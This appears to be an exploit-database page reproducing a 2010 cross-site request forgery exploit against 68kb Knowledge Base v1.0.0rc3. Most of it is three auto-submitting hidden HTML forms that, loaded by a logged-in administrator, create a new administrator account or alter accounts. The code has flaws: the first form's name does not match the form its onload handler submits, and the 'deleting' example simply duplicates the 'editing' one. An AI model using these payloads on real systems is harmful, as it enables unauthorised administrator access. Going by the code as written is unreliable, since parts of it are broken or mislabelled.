header-logo
Suggest Exploit
vendor:
Knowledge Base
by:
Jelmer de Hen
4,3
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Knowledge Base
Affected Version From: v1.0.0rc3
Affected Version To: v1.0.0rc3
Patch Exists: N/A
Related CWE: N/A
CPE: 68kb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

68kb Knowledge Base v1.0.0rc3 create administrator account CSRF

This exploit allows an attacker to create an administrator account on the 68kb Knowledge Base v1.0.0rc3 software. The attacker can craft a malicious HTML page that contains a form with hidden fields that contain the username, email, level, password, and passconf of the new account. When the victim visits the malicious page, the form is automatically submitted and the new account is created. The attacker can also use the same technique to delete or edit existing accounts.

Mitigation:

The application should validate the request origin and verify that the user is authorized to perform the requested action.
Source

Exploit-DB raw data:

Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF
Date: 2010-04-02
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip
Version: v1.0.0rc3

<html>
<body onload="document.forms["edit"].submit()">
<form name="create" method="post" action="http://<server>/index.php/admin/users/add">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
</form>
</body>
</html>

Example of deleting an account:

<html>
<body onload="document.forms["edit"].submit()">
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
<input type=hidden name="id" value="1">
</form>
</body>
</html>

Example of editing:

<html>
<body onload="document.forms["edit"].submit()">
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
<input type=hidden name="id" value="1">
</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR